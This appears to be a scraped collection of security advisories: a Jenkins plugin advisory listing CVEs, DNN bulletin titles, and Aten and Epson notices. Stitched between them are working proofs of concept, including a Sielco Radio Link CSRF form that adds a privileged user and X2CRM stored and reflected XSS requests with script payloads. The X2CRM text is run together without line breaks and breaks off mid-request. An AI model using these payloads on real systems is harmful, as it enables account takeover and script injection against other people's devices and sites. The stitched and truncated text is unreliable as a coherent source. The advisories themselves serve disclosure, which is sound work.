A missing permission check in Jenkins Assembla merge request builder Plugin 1.1.13 and earlier allows unauthenticated attackers to trigger builds of jobs corresponding to the attacker-specified repository.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Assembla merge request builder Plugin
*   Azure Key Vault Plugin
*   Consul KV Builder Plugin
*   Fogbugz Plugin
*   Image Tag Parameter Plugin
*   Kubernetes Plugin
*   Lucene-Search Plugin
*   NeuVector Vulnerability Scanner Plugin
*   Quay.io trigger Plugin
*   Report Portal Plugin
*   Thycotic DevOps Secrets Vault Plugin
*   Thycotic Secret Server Plugin
*   TurboScript Plugin
*   WSO2 Oauth Plugin

**Descriptions****Improper masking of credentials in multiple plugins**

**SECURITY-3075 / CVE-2023-30513 (Kubernetes), CVE-2023-30514 (Azure Key Vault), CVE-2023-30515 (Thycotic DevOps Secrets Vault)**  
**Severity (CVSS):** Medium  
**Affected plugins: kubernetes , azure-keyvault , thycotic-devops-secrets-vault**  
**Description:**

Multiple plugins do not properly mask (i.e., replace with asterisks) credentials printed in the build log from Pipeline steps like sh and bat, when both of the following conditions are met:

*   The credentials are printed in build steps executing on an agent (typically inside a node block).
    
*   Push mode for durable task logging is enabled. This is a hidden option in Pipeline: Nodes and Processes that can be enabled through the Java system property org.jenkinsci.plugins.workflow.steps.durable_task.DurableTaskStep.USE_WATCHING. It is also automatically enabled by some plugins, e.g., OpenTelemetry and Pipeline Logging over CloudWatch.
    

The following plugins are affected by this vulnerability:

*   Kubernetes 3909.v1f2c633e8590 and earlier (SECURITY-3079 / CVE-2023-30513)
    
*   Azure Key Vault 187.va\_cd5fecd198a\_ and earlier (SECURITY-3051 / CVE-2023-30514)
    
*   Thycotic DevOps Secrets Vault 1.0.0 (SECURITY-3078 / CVE-2023-30515)
    

The following plugins have been updated to properly mask credentials in the build log when push mode for durable task logging is enabled:

*   Kubernetes 3910.ve59cec5e33ea\_ (SECURITY-3079 / CVE-2023-30513)
    
*   Azure Key Vault 188.vf46b\_7fa\_846a\_1 (SECURITY-3051 / CVE-2023-30514)
    

As of publication of this advisory, there is no fix available for the following plugin:

*   Thycotic DevOps Secrets Vault 1.0.0 (SECURITY-3078 / CVE-2023-30515)
    

An improvement in Credentials Binding 523.525.vb\_72269281873 implements a workaround that applies build log masking even in affected plugins. This workaround is temporary and potentially incomplete, so it is still recommended that affected plugins be updated to resolve this issue.

**Disabled SSL/TLS certificate validation for existing configurations in Image Tag Parameter Plugin**

**SECURITY-2840 / CVE-2023-30516**  
**Severity (CVSS):** Medium  
**Affected plugin: image-tag-parameter**  
**Description:**

Image Tag Parameter Plugin 2.0 improperly introduces an option to opt out of SSL/TLS certificate validation when connecting to Docker registries.

Job configurations using Image Tag Parameters that were created before 2.0 will have SSL/TLS certificate validation disabled by default.

**SSL/TLS certificate validation unconditionally disabled by NeuVector Vulnerability Scanner Plugin**

**SECURITY-2841 / CVE-2023-30517**  
**Severity (CVSS):** Medium  
**Affected plugin: neuvector-vulnerability-scanner**  
**Description:**

NeuVector Vulnerability Scanner Plugin 1.22 and earlier unconditionally disables SSL/TLS certificate and hostname validation when connecting to a configured NeuVector Vulnerability Scanner server.

**Missing permission check in Thycotic Secret Server Plugin allows enumerating credentials IDs**

**SECURITY-2837 / CVE-2023-30518**  
**Severity (CVSS):** Medium  
**Affected plugin: thycotic-secret-server**  
**Description:**

Thycotic Secret Server Plugin 1.0.2 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

**Lack of authentication mechanism in Quay.io trigger Plugin webhook**

**SECURITY-2849 / CVE-2023-30519**  
**Severity (CVSS):** Medium  
**Affected plugin: quayio-trigger**  
**Description:**

Quay.io trigger Plugin provides a webhook endpoint at /quayio-webhook/ that can be used to trigger builds of jobs configured to use a specified repository.

In Quay.io trigger Plugin 0.1 and earlier, this endpoint can be accessed without authentication.

This allows unauthenticated attackers to trigger builds of jobs corresponding to the attacker-specified repository.

**Stored XSS vulnerability in Quay.io trigger Plugin**

**SECURITY-2850 / CVE-2023-30520**  
**Severity (CVSS):** High  
**Affected plugin: quayio-trigger**  
**Description:**

Quay.io trigger Plugin 0.1 and earlier does not limit URL schemes for repository homepage URLs submitted via Quay.io trigger webhooks.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to submit crafted Quay.io trigger webhook payloads.

**Lack of authentication mechanism in Assembla merge request builder Plugin webhook**

**SECURITY-2872 / CVE-2023-30521**  
**Severity (CVSS):** Medium  
**Affected plugin: assembla-merge-request-builder**  
**Description:**

Assembla merge request builder Plugin provides a webhook endpoint at /assembla-webhook/ that can be used to trigger builds of jobs configured to use a specified repository.

In Assembla merge request builder Plugin 1.1.13 and earlier, this endpoint can be accessed without authentication.

This allows unauthenticated attackers to trigger builds of jobs corresponding to the attacker-specified repository.

**Lack of authentication mechanism in Fogbugz Plugin webhook**

**SECURITY-2873 / CVE-2023-30522**  
**Severity (CVSS):** Medium  
**Affected plugin: fogbugz**  
**Description:**

Fogbugz Plugin provides a webhook endpoint at /fbTrigger/ that can be used to trigger builds of any jobs.

In Fogbugz Plugin 2.2.17 and earlier, this endpoint can be accessed by attackers with Item/Read permission, allowing them to trigger builds of jobs specified in a jobname request parameter.

**Tokens stored and displayed in plain text by Report Portal Plugin**

**SECURITY-2945 / CVE-2023-30523 (storage), CVE-2023-30524 (masking)**  
**Severity (CVSS):** Medium  
**Affected plugin: reportportal**  
**Description:**

Report Portal Plugin 0.5 and earlier stores ReportPortal access tokens unencrypted in job config.xml files on the Jenkins controller as part of its configuration.

These tokens can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system.

Additionally, the configuration form does not mask these tokens, increasing the potential for attackers to observe and capture them.

**CSRF vulnerability and missing permission check in Report Portal Plugin**

**SECURITY-2950 / CVE-2023-30525 (CSRF), CVE-2023-30526 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: reportportal**  
**Description:**

Report Portal Plugin 0.5 and earlier does not perform a permission check in a method implementing form validation.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified bearer token authentication.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

**Client secret stored and displayed in plain text by WSO2 Oauth Plugin**

**SECURITY-2992 / CVE-2023-30527 (storage), CVE-2023-30528 (masking)**  
**Severity (CVSS):** Low  
**Affected plugin: wso2id-oauth**  
**Description:**

WSO2 Oauth Plugin 1.0 and earlier stores the WSO2 Oauth client secret unencrypted in the global config.xml file on the Jenkins controller as part of its configuration.

This client secret can be viewed by users with access to the Jenkins controller file system.

Additionally, the global configuration form does not mask the WSO2 Oauth client secret, increasing the potential for attackers to observe and capture it.

**CSRF vulnerability in Lucene-Search Plugin**

**SECURITY-3013 / CVE-2023-30529**  
**Severity (CVSS):** Medium  
**Affected plugin: lucene-search**  
**Description:**

Lucene-Search Plugin 387.v938a\_ecb\_f7fe9 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to reindex the database.

**Token stored and displayed in plain text by Consul KV Builder Plugin**

**SECURITY-2944 / CVE-2023-30530 (storage), CVE-2023-30531 (masking)**  
**Severity (CVSS):** Medium  
**Affected plugin: consul-kv-builder**  
**Description:**

Consul KV Builder Plugin 2.0.13 and earlier stores the HashiCorp Consul ACL Token unencrypted in its global configuration file org.jenkinsci.plugins.consulkv.GlobalConsulConfig.xml on the Jenkins controller as part of its configuration.

This token can be viewed by users with access to the Jenkins controller file system.

Additionally, the global configuration form does not mask the token, increasing the potential for attackers to observe and capture it.

**Lack of authentication mechanism in TurboScript Plugin webhook**

**SECURITY-2851 / CVE-2023-30532**  
**Severity (CVSS):** Medium  
**Affected plugin: spoonscript**  
**Description:**

TurboScript Plugin provides a webhook endpoint at /turbo-webhook/ that can be used to trigger builds of jobs configured to use a specified repository.

In TurboScript Plugin 1.3 and earlier, this endpoint can be accessed by attackers with Item/Read permission to trigger builds of jobs corresponding to the attacker-specified repository.

**Severity**

*   SECURITY-2837: Medium
*   SECURITY-2840: Medium
*   SECURITY-2841: Medium
*   SECURITY-2849: Medium
*   SECURITY-2850: High
*   SECURITY-2851: Medium
*   SECURITY-2872: Medium
*   SECURITY-2873: Medium
*   SECURITY-2944: Medium
*   SECURITY-2945: Medium
*   SECURITY-2950: Medium
*   SECURITY-2992: Low
*   SECURITY-3013: Medium
*   SECURITY-3075: Medium

**Affected Versions**

*   **Assembla merge request builder Plugin** up to and including 1.1.13
*   **Azure Key Vault Plugin** up to and including 187.va\_cd5fecd198a\_
*   **Consul KV Builder Plugin** up to and including 2.0.13
*   **Fogbugz Plugin** up to and including 2.2.17
*   **Image Tag Parameter Plugin** up to and including 2.0
*   **Kubernetes Plugin** up to and including 3909.v1f2c633e8590
*   **Lucene-Search Plugin** up to and including 387.v938a\_ecb\_f7fe9
*   **NeuVector Vulnerability Scanner Plugin** up to and including 1.22
*   **Quay.io trigger Plugin** up to and including 0.1
*   **Report Portal Plugin** up to and including 0.5
*   **Thycotic DevOps Secrets Vault Plugin** up to and including 1.0.0
*   **Thycotic Secret Server Plugin** up to and including 1.0.2
*   **TurboScript Plugin** up to and including 1.3
*   **WSO2 Oauth Plugin** up to and including 1.0

**Fix**

*   **Azure Key Vault Plugin** should be updated to version 188.vf46b\_7fa\_846a\_1
*   **Kubernetes Plugin** should be updated to version 3910.ve59cec5e33ea\_

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Assembla merge request builder Plugin
*   Consul KV Builder Plugin
*   Fogbugz Plugin
*   Image Tag Parameter Plugin
*   Lucene-Search Plugin
*   NeuVector Vulnerability Scanner Plugin
*   Quay.io trigger Plugin
*   Report Portal Plugin
*   Thycotic DevOps Secrets Vault Plugin
*   Thycotic Secret Server Plugin
*   TurboScript Plugin
*   WSO2 Oauth Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **CC Bomber, Kitri BoB** for SECURITY-2944, SECURITY-2945
*   **Daniel Beck, CloudBees, Inc.** for SECURITY-2837, SECURITY-2840, SECURITY-3013
*   **Kevin Guerroudj, CloudBees, Inc.** for SECURITY-2849, SECURITY-2850, SECURITY-2851, SECURITY-2992
*   **Kevin Guerroudj, CloudBees, Inc. and Yaroslav Afenkin, CloudBees, Inc.** for SECURITY-2873
*   **Pavel Nakonechnyi, Netcetera AG** for SECURITY-2841
*   **Tim Jacomb** for SECURITY-3075
*   **Yaroslav Afenkin, CloudBees, Inc.** for SECURITY-2950
*   **Yaroslav Afenkin, CloudBees, Inc. and Kevin Guerroudj, CloudBees, Inc.** for SECURITY-2872

CVE-2023-30521: Jenkins Security Advisory 2023-04-12

Jenkins NeuVector Vulnerability Scanner Plugin 1.22 and earlier unconditionally disables SSL/TLS certificate and hostname validation when connecting to a configured NeuVector Vulnerability Scanner server.

CVE-2023-30517: Jenkins Security Advisory 2023-04-12

Sielco Radio Link version 2.06 suffers from a cross site request forgery vulnerability.

CSRF Add Admin:  
---------------

<html>  
  <body>  
    <form action="http://radiolink/protect/users_rx.htm" method="POST">  
      <input type="hidden" name="pwd0" value="" />  
      <input type="hidden" name="pwd0bis" value="" />  
      <input type="hidden" name="user1" value="Reader" />  
      <input type="hidden" name="pwd1" value="123456" />  
      <input type="hidden" name="pwd1bis" value="123456" />  
      <input type="hidden" name="auth1" value="2" />  
      <input type="hidden" name="user2" value="" />  
      <input type="hidden" name="pwd2" value="" />  
      <input type="hidden" name="pwd2bis" value="" />  
      <input type="hidden" name="auth2" value="0" />  
      <input type="hidden" name="user3" value="" />  
      <input type="hidden" name="pwd3" value="" />  
      <input type="hidden" name="pwd3bis" value="" />  
      <input type="hidden" name="auth3" value="0" />  
      <input type="submit" value="Adminize Me!" />  
    </form>  
  </body>  
</html>

Sielco Radio Link 2.06 Cross Site Request Forgery

An arbitrary file upload vulnerability in the Digital Assets Manager module of DNN Corp DotNetNuke v7.0.0 to v9.10.2 allows attackers to execute arbitrary code via a crafted SVG file.

DNN Platform Version:

2022-01 (Critical) Moment.js Security Enhancements Published: 9/28/2022

2022-02 (Critical) CKEditor Security Enhancements Published: 9/28/2022

2022-03 (Medium) Stored XSS Injection Vulnerability Published: 9/28/2022

2022-04 (Medium) XSS in Digital Asset Manager Published: 9/28/2022

2022-05 (Medium) jQuery and jQuery UI Security Enhancements Published: 9/28/2022

2022-06 (Low) Unrestricted Website Redirect in Plugin Published: 9/28/2022

2022-07 (Medium) Knockout.js Security Enhancements Published: 9/28/2022

2022-08 (Medium) Secure Credential Disclosure Published: 9/28/2022

2022-09 (Critical) Newtonsoft JSON Security Updates Published: 9/28/2022

2022-10 (Critical) Sharp Zip Lib Security Enhancements Published: 9/28/2022

2022-11 (Medium) Log4Net Security Enhancements Published: 9/28/2022

2022-12 (Medium) Remote File Download and Path Traversal Published: 9/28/2022

2022-13 (Medium) Authentication Provider Bypass Published: 9/28/2022

2021-01 (Critical) Optional Telerik Removal Suggested Published: 8/24/2021

2021-02 (Critical) Anonymous User File Download Published: 8/24/2021

2020-07 (Low) jQuery Security Issue Published: 5/14/2020

2020-01 (Low) Interaction with “soft-deleted” modules Published: 5/7/2020

2020-02 (Critical) Telerik CVE-2019-19790 (Path Traversal) Published: 5/7/2020

2020-03 (Medium) Javascript Library Vulnerabilities Published: 5/7/2020

2020-04 (Medium) XSS Scripting Risk Published: 5/7/2020

2020-05 (Critical) Path Traversal & Manipulation (ZipSlip) Published: 5/7/2020

2020-06 (Low) Access Control Bypass - Private Message Attachment Published: 5/7/2020

2019-04 (Critical) Possible Unauthorized File Access Published: 11/22/2019

2019-05 (Medium) Possible User Information Discovery Published: 11/22/2019

2019-06 (Low) Possible Stored Cross-Site Scripting (XSS) Execution Published: 11/22/2019

2019-07 (Medium) Possibility of Uploading Malicious Files Published: 11/22/2019

2019-01 (Low) Possible Denial of Service (DDos) or XSS Issue Published: 4/16/2019

2019-02 (Medium) Possible Cross Site Scripting (XSS) Execution Published: 4/16/2019

2019-03 (Medium) Possible Leaked Cryptographic Information Published: 4/16/2019

2018-13 (Critical) Possible Leaked Cryptographic Information Published: 10/1/2018

2018-14 (Low) Possible Cross-Site Scripting (XSS) Vulnerability Published: 10/1/2018

2018-11 (Low) Possibility for Denial of Service (DOS) Published: 3/29/2018

2018-12 (Low) Possibility to Upload Images as Anonymous User Published: 3/29/2018

2018-01 (Low) Active Directory module is subject to blind LDAP injection Published: 3/29/2018

2018-02 (Low) Return URL open to phishing attacks Published: 3/29/2018

2018-03 (Low) Potential XSS issue in user profile Published: 3/29/2018

2018-04 (Low) WEB API allowing file path traversal Published: 3/29/2018

2018-05 (Low) Possible XML External Entity (XXE) Processing Published: 3/29/2018

2018-06 (Low) Activity Stream file sharing API can share other user's files Published: 3/29/2018

2018-07 (Low) SVG XSS Vulnerability Published: 3/29/2018

2018-08 (Low) Admin Security Settings Vulnerability Published: 3/29/2018

2018-09 (Low) Possible Server Side Request Forgery (SSRF) / CVE-2017-0929 Published: 3/29/2018

2017-06 (Low) Vulnerable ASP.NET MVC library (assembly) in Platform 8.0.0 and Evoq 8.3.0 Published: 7/5/2017

2017-07 (Low) SWF files can be vulnerable to XSS attacks Published: 7/5/2017

2017-08 (Critical) Possible remote code execution on DNN sites Published: 7/5/2017

2017-09 (Low) HTML5: overly permissive message posting policy on DNN sites Published: 7/5/2017

2017-11 (Low) Possibility of URL redirection abuse in DNN sites Published: 7/5/2017

2017-10 (Critical) Possibility of uploading malicious files to DNN sites Published: 7/5/2017

2017-05 (Critical) Revealing of Profile Properties Published: 2/17/2017

2017-01 (Medium) Antiforgery checks on Web APIs can be ignored in certain situations Published: 1/26/2017

2017-02 (Low) Authorization can be bypassed for few Web APIs Published: 1/26/2017

2017-03 (Low) Socially engineered link can trick users into some unwanted actions Published: 1/26/2017

2017-04 (Low) Unauthorized file-copies can cause disk space issues Published: 1/26/2017

2016-08 (Low) Certain keywords in Search may give an error page Published: 8/20/2016

2016-09 (Medium) Non-Admin users with Edit permissions may change site containers Published: 8/20/2016

2016-10 (Low) Registration link may be used to redirect users to external links Published: 8/20/2016

2016-07 (Low) Image files may be copied from DNN's folder to anywhere on Server Published: 8/20/2016

2016-06 (Critical) Unauthorized users may create new SuperUser accounts Published: 5/26/2016

2016-05 (Critical) Potential file upload by unauthenticated users Published: 4/21/2016

2016-01 (Low) Potential open-redirect and XSS issue on the query string parameter - returnurl Published: 3/16/2016

2016-02 (Low) Potential XSS issue when enable SSL Client Redirect Published: 3/16/2016

2016-03 (Low) Potential XSS issue on user's profile Published: 3/16/2016

2016-04 (Critical) Potential CSRF issue on WebAPI POST requests Published: 3/16/2016

2015-06 (Low) Potential XSS issue when using tabs dialog Published: 10/6/2015

2015-07 (Medium) Users are getting registered even though User Registration is set to None Published: 10/6/2015

2015-02 (Low) ability to confirm file existance Published: 5/26/2015

2015-03 (Low) Version information leakage Published: 5/26/2015

2015-04 (Low) Server-Side Request Forgery in File Upload Published: 5/26/2015

2015-05 (Critical) unauthorized users may create new host accounts Published: 5/26/2015

2015-01 (Low) potential persistent cross-site scripting issue Published: 2/4/2015

2014-03 (Medium) Failure to validate user messaging permissions Published: 10/1/2014

2014-02 (Critical) improve captcha logic & mitigate against automated registration attacks Published: 8/13/2014

2014-01 (Low) potential persistent cross-site scripting issue Published: 3/19/2014

2013-10 (Low) potential reflective xss issue Published: 12/4/2013

2013-07 (Low) potential reflective xss issue Published: 8/13/2013

2013-08 (Low) malformed html may allow XSS issue Published: 8/13/2013

2013-09 (Low) fix issue that could lead to redirect 'Phishing' attack Published: 8/13/2013

2013-04 (Medium) Failure to reapply folder permissions check Published: 4/3/2013

2013-05 (Low) Potential XSS in language skin object Published: 4/3/2013

2013-06 (Low) Non-compliant HTML tag can cause site redirects Published: 4/3/2013

2013-01 (Low) Added defensive code to protect against denial of service Published: 1/7/2013

2013-02 (Critical) Protect against member directory filtering issue Published: 1/7/2013

2013-03 (Low) Filter out unrequired tag Published: 1/7/2013

2012-9 (Low) Failure to encode module title Published: 11/15/2012

2012-10 (Low) List function contains a cross-site scripting issue Published: 11/15/2012

2012-11 (Low) Member directory results fail to apply extended visibility correctly Published: 11/15/2012

2012-12 (Critical) Member directory results fail to apply extended visibility correctly Published: 11/15/2012

2012-5 (Low) Deny folder permissions were not respected when generating folder lists Published: 7/2/2012

2012-6 (Medium) Module Permission Inheritance Published: 7/2/2012

2012-7 (Low) Cross-site scripting issue with list function Published: 7/2/2012

2012-8 (Low) Journal image paths can contain javascript Published: 7/2/2012

2012-4 (Medium) Filemanager function fails to check for valid file extensions Published: 3/7/2012

2012-1 (Low) Potential XSS issue via modal popups Published: 1/2/2012

2012-2 (Critical) Non-approved users can access user and role functions Published: 1/2/2012

2012-3 (Low) Radeditor provider function could confirm the existence of a file Published: 1/2/2012

2011-16 (Low) Cached failed passwords could theoretically be retrieved from browser cache Published: 12/14/2011

2011-17 (Low) invalid install permissions can lead to unauthorized access error which echoes path Published: 12/14/2011

2011-14 (Low) able autoremember during registration Published: 11/1/2011

2011-15 (Medium) failure to sanitize certain xss strings Published: 11/1/2011

2011-13 (Low) incorrect logic in module administration check Published: 8/24/2011

2011-8 (Low) ability to reactivate user profiles of soft-deleted users Published: 6/6/2011

2011-9 (Critical) User management mechanisms can be executed by invalid users Published: 6/6/2011

2011-10 (Low) Cached failed passwords could theoretically be retrieved from browser cache Published: 6/6/2011

2011-11 (Medium) remove support for legacy skin/container upload from filemanager Published: 6/6/2011

2011-12 (Medium) Module Permissions Editable by anyone with the URL Published: 6/6/2011

2011-1 (Critical) Edit Level Users have Admin rights to modules Published: 1/19/2011

2011-2 (Critical) Unauthenticated user can install/uninstall modules Published: 1/19/2011

2011-3 (Low) Failure to filter viewstate exception details can lead to reflective xss issue Published: 1/19/2011

2011-4 (Low) Remove OS identification code Published: 1/19/2011

2011-5 (Low) Add additional checks to core input filter Published: 1/19/2011

2011-6 (Low) Change localized text to stop user enumeration Published: 1/19/2011

2011-7 (Low) Ensure that profile properties are correctly filtered Published: 1/19/2011

2010-12 (Medium) Potential resource exhaustion Published: 8/17/2010

2010-06 (Low) Logfiles contents after exception may lead to information leakage Published: 6/17/2010

2010-07 (Medium) Cross-site request forgery possible against other users of a site Published: 6/14/2010

2010-08 (Low) update inputfilter blacklist for invalid tag that could allow XSS attack Published: 6/14/2010

2010-09 (Low) Mail function can result in unauthorized email access Published: 6/14/2010

2010-10 (Low) Member only profile properties could be exposed under certain conditions Published: 6/14/2010

2010-11 (Low) Profile properties not htmlencoding data Published: 6/14/2010

2010-05 (Low) HTML/Script Code Injection Vulnerability in User messaging Published: 5/19/2010

2010-04 (Low) Install Wizard information leakage Published: 5/18/2010

2010-03 (Critical) System mails stored in cleartext in User messaging Published: 4/20/2010

2010-02 (Low) HTML/Script Code Injection Vulnerability Published: 3/17/2010

2010-01 (Low) User account escalation Vulnerability Published: 2/17/2010

2009-06 (Low) 2009-06 Published: 11/26/2009

2009-07 (Low) 2009-07 Published: 11/26/2009

2009-04 (Low) HTML/Script Code Injection Vulnerability when working with multiple languages Published: 9/2/2009

2009-05 (Medium) HTML/Script Code Injection Vulnerability in ClientAPI Published: 5/20/2009

2009-02 (Low) Errorpage information leakage Published: 5/19/2009

2009-03 (Low) HTML/Script Code Injection Vulnerability Published: 5/19/2009

2009-01 (Low) HTML/Script Code Injection Vulnerability Published: 4/7/2009

2008-14 (Critical) User can gain access to additional roles Published: 12/24/2008

2008-12 (Low) Install wizard information leakage Published: 9/10/2008

2008-13 (Critical) Failure to validate when loading skins Published: 9/10/2008

2008-11 (Critical) Authentication blindspot in User functions Published: 9/9/2008

2008-4 (Low) Version information leakage Published: 5/27/2008

2008-5 (Low) Denial of Service attack Published: 5/27/2008

2008-6 (Critical) Force existing database scripts to re-run Published: 5/27/2008

2008-7 (Critical) Failure to revalidate file and folder permissions correctly for uploads Published: 5/27/2008

2008-8 (Low) HTML/Script Code Injection Vulnerability Published: 5/11/2008

2008-9 (Low) HTML/Script Code Injection Vulnerability Published: 5/11/2008

2008-10 (Low) HTML/Script Code Injection Vulnerability when operating with multiple languages Published: 5/11/2008

2018-10 (Low) Custom 404 Error Page Vulnerability Published: 3/29/2008

2008-1 (Critical) Administrator account permission escalation Published: 3/19/2008

2008-2 (Critical) Validationkey can be a known value Published: 3/19/2008

2008-3 (Critical) Ability to create dynamic scripts on server Published: 3/19/2008

2007-3 (Low) HTML/Script Code Injection Vulnerability Published: 11/6/2007

2007-4 (Critical) HTML/Text module authentication blindspot Published: 11/6/2007

2007-2 (Low) Phishing risk in login redirect code Published: 7/20/2007

2007-1 (Medium) Phishing risk in link code Published: 4/5/2007

2006-6 (Medium) Anonymous access to vendor details Published: 11/30/2006

2006-4 (Critical) Cross site scripting permission escalation Published: 11/16/2006

2006-5 (Low) Information Leakage Published: 11/16/2006

2006-3 (Low) HTML Code Injection Vulnerability Published: 9/17/2006

2006-1 (Medium) Vulnerability in DotNetNuke could allow restricted file types to be uploaded Published: 8/2/2006

2006-2 (Critical) Vulnerability in DotNetNuke could allow access to user profile details Published: 8/2/2006

CVE-2022-47053: DNN Security Updates | DNN (DotNetNuke)

Aten PE8108 2.4.232 is vulnerable to Incorrect Access Control. The device allows unauthenticated access to Telnet and SNMP credentials.

CVE-2023-25413: Multiple vulnerabilities in Aten PE8108 power distribution unit

Aten PE8108 2.4.232 is vulnerable to Incorrect Access Control. Restricted users have access to other users outlets.

CVE-2023-25409: Multiple vulnerabilities in Aten PE8108 power distribution unit

Cross-site request forgery (CSRF) vulnerability in SEIKO EPSON printers/network interface Web Config allows a remote unauthenticated attacker to hijack the authentication and perform unintended operations by having a logged-in user view a malicious page. [Note] Web Config is the software that allows users to check the status and change the settings of SEIKO EPSON printers/network interface via a web browser. According to SEIKO EPSON CORPORATION, it is also called as Remote Manager in some products. Web Config is pre-installed in some printers/network interface provided by SEIKO EPSON CORPORATION. For the details of the affected product names/model numbers, refer to the information provided by the vendor.

Published:2023/03/08  Last Updated:2023/03/08

**Overview**

SEIKO EPSON printers/network interface Web Config contains multiple vulnerabilities.

**Products Affected**

*   Web Config

Web Config is the software that allows users to check the status and change the settings of SEIKO EPSON printers/network interface via a web browser. According to the developer, it is also called as Remote Manager in some products.

Web Config is pre-installed in some printers/network interface provided by SEIKO EPSON CORPORATION. For the details of the affected product names/model numbers, refer to the information provided by the developer.

**Description**

Web Config for printers/network interface provided by SEIKO EPSON CORPORATION contains multiple vulnerabilities listed below.

*   **Stored cross-site Scripting (CWE-79)** - CVE-2023-27520
    
    CVSS v3
    
    CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    
    **Base Score: 4.8**
    
    CVSS v2
    
    AV:N/AC:M/Au:S/C:N/I:P/A:N
    
    **Base Score: 3.5**
    
*   **Cross-Site Request Forgery (CWE-352)** - CVE-2023-23572
    
    CVSS v3
    
    CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
    
    **Base Score: 4.3**
    
    CVSS v2
    
    AV:N/AC:H/Au:N/C:N/I:P/A:N
    
    **Base Score: 2.6**
    

**Impact**

*   An arbitrary script may be executed on the web browser of the user who is accessing the settings page of the product - CVE-2023-27520
*   If a user views a malicious page while logged in to the settings page of the product, unintended operations may be performed - CVE-2023-23572

**Solution**

**Update the firmware**  
Update the firmware to the latest version according to the information provided by the developer.  
The developer states that the respective updates are scheduled to be released in April 2023.

**Apply workarounds**  
The developer strongly recommends users to apply workarounds before the respective updates are available.

For more information, refer to the information provided by the developer.

**Vendor Status**

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

**Credit**

Takaya Noma, Yudai Morii, Hiroki Yasui, Takayuki Sasaki, and Katsunari Yoshioka of Yokohama National University reported these vulnerabilities to IPA.  
JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.

**Other Information**

CVE-2023-27520: Multiple vulnerabilities in SEIKO EPSON printers/network interface Web Config

X2CRM versions 6.6 and 6.9 suffer from multiple cross site scripting vulnerabilities.

    # Exploit Title: X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)# Exploit Author: Betul Denizler# Vendor Homepage: https://x2crm.com/# Software Link: https://sourceforge.net/projects/x2engine/# Version: X2CRM v6.6/6.9# Tested on: Ubuntu Mate 20.04# Vulnerable Parameter: Actions[subject]# CVE: CVE-2022-48178# Date: 27.12.2022'''POC REQUEST:========POST /c2xrm/x2engine/index.php/actions/update?id=1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 172Origin: http://localhostConnection: closeReferer: http://localhost/c2xrm/x2engine/index.php/actions/viewAction?id=1Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=kg3n7kcjqtm29fc7n4m72m0bt5; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; 5d8630d289284e8c14d15b14f4b4dc28=779a63cb39d04cca59b4a3b9b2a4fad817930211a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%224%22%3Bi%3A1%3Bs%3A5%3A%22test2%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=Ncr7UIvK2yPvHzZc8koNW4DaIXxwZnsrSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originYII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab&Actions%5Bsubject%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&Actions%5Bpriority%5D=1&Actions%5BactionDescription%5D=testEXPLOITATION========1. Create an action2. Inject payload to the vulnerable parameter in POST requestPayload: %3Cscript%3Ealert(1)%3C%2Fscript%3E'''# Exploit Title: X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)# Exploit Author: Betul Denizler# Vendor Homepage: https://x2crm.com/# Software Link: https://sourceforge.net/projects/x2engine/# Version: X2CRM v6.6/6.9# Tested on: Ubuntu Mate 20.04# Vulnerable Parameter: model# CVE: Use CVE-2022-48177# Date: 27.12.2022'''POC REQUEST:========GET /x2crm/x2engine/index.php/admin/importModels?model=asd%22%3E%3Cbody%20onload=%22alert(4)%22%3E HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=959fpkms4abdhtresce9k9rmk3; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; 